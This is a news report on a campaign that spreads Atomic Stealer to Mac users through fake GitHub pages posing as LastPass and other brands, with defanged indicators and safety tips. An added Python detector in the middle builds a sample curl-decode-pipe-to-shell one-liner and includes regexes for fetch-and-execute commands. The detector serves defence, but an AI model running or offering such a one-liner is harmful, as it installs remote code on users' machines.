- Atomic Stealer malware installs silently via fake GitHub pages aimed at Mac users
- Attackers create multiple GitHub accounts to bypass platform takedowns and return repeatedly
- Users who copy commands from non-verified sites risk severe system compromise
Cybersecurity researchers are warning Apple Mac users about a campaign that uses fake GitHub repositories to spread malware and infostealers.
The findings come from LastPass Threat Intelligence, Mitigation and Escalation (TIME) analysts, who found that attackers impersonate well-known businesses to convince people to download fake Mac software.
Two fake GitHub pages purporting to offer LastPass for Mac were first spotted on September 16, 2025 under the username “ModHopmduck476.”
How the attack chain works
While these particular pages have since been taken down, the incident points to a wider pattern that continues to develop.
The fake GitHub pages included links labeled “Install LastPass on MacBook”, which redirected to hxxps://ahoastock825[.]github[.]io/.GitHub/Lastpass.
From there, users were sent to macprograms-pro[.]com/Mac-Git-2-Download.html and asked to paste a command into their Mac’s Terminal.
That command used a curl request to fetch a base64-encoded URL, which decoded to bonoud[.]com/Get3/Install.sh.
The script then delivered an “update” payload that installed Atomic Stealer (AMOS malware) into the temporary directory.
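As an added, defender-side illustration (not code from the article or from LastPass), the following Python scans shell-history or process command lines for the pattern described above: a base64-encoded URL decoded inline, fetched with curl, and piped straight into a shell. The sample lines and the example.invalid URL are constructed, not the campaign's real command.

```python
import base64
import re

# Constructed sample shell-history lines (NOT the campaign's real command).
# The second line mimics the pattern the article describes: a base64-encoded
# URL is decoded on the fly, fetched with curl, and piped into a shell.
_B64_URL = base64.b64encode(b"https://example.invalid/get/install.sh").decode()
SAMPLE_HISTORY = [
    "brew install --cask 1password",
    f'curl -fsSL "$(echo {_B64_URL} | base64 -d)" | sh',
    "ls -la ~/Library/Application\\ Support",
]

B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")      # base64-looking runs
FETCH = re.compile(r"\b(curl|wget)\b")                   # network download tool
DECODE = re.compile(r"\bbase64\b[^|]*(-d|-D|--decode)")  # inline decode step
PIPE_TO_SHELL = re.compile(r"\|\s*(sudo\s+)?(ba|z)?sh\b")  # output fed to a shell
URL = re.compile(r"https?://[^\s'\"]+")


def decoded_urls(line: str) -> list[str]:
    """Decode every base64-looking token in the line; return URLs hidden inside."""
    urls = []
    for token in B64_TOKEN.findall(line):
        try:
            text = base64.b64decode(token, validate=True).decode("utf-8", "ignore")
        except Exception:  # not valid base64, or wrong padding: skip the token
            continue
        urls.extend(URL.findall(text))
    return urls


def analyze(line: str) -> dict:
    """Score one command line for the fetch -> base64-decode -> pipe-to-shell chain."""
    hits = {
        "fetch": bool(FETCH.search(line)),
        "base64_decode": bool(DECODE.search(line)),
        "pipe_to_shell": bool(PIPE_TO_SHELL.search(line)),
    }
    urls = decoded_urls(line)
    # A download that is piped into a shell, decoded from base64, or whose
    # target URL is hidden in base64 is what this campaign relies on.
    suspicious = hits["fetch"] and (hits["pipe_to_shell"] or hits["base64_decode"] or bool(urls))
    return {"line": line, "suspicious": suspicious, "hidden_urls": urls, **hits}


def scan(lines) -> list[dict]:
    """Return the analysis records for every suspicious line."""
    return [rec for rec in map(analyze, lines) if rec["suspicious"]]
```

Run it over `~/.zsh_history` or EDR process-command-line telemetry to surface pasted "install" one-liners that hide their download URL.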
Atomic Stealer, active since April 2023, is a well-known infostealer used by financially motivated cybercrime groups.
Investigators have linked this campaign to many other fake repositories that mimic companies ranging from financial institutions to productivity apps.
The list of targeted names includes 1Password, Robinhood, Citibank, Docker, Shopify, Basecamp and several others.
Attackers appear to create additional GitHub usernames to outlast takedowns, and they use search engine optimization to push their malicious links higher in Google and Bing search results.
This technique increases the chances that Mac users searching for legitimate downloads will encounter the fake pages first.
LastPass says it “actively monitors this campaign” while working on takedowns and sharing indicators of compromise to help others detect the threat.
The attackers’ use of GitHub Pages highlights both the convenience and the risk of community platforms.
Fraudulent repositories can be set up quickly, and although GitHub can remove them, attackers often return under new aliases.
This cycle raises questions about how effectively such platforms can protect users.
How to remain safe
- Download software only from verified sources to avoid the risk of malware and ransomware.
- Avoid copying commands from unknown sites into the terminal to prevent unauthorized code execution.
- Keep macOS and all installed software up to date to reduce exploitable vulnerabilities.
- Use reputable antivirus or security software that includes ransomware protection to block threats.
- Enable regular system backups so files can be recovered if ransomware or malware strikes.
- Be skeptical of unexpected links, emails and pop-ups to minimize exposure.
- Monitor official advisories from trusted vendors for timely security updates and guidance.
- Configure strong, unique passwords and enable two-factor authentication for important accounts.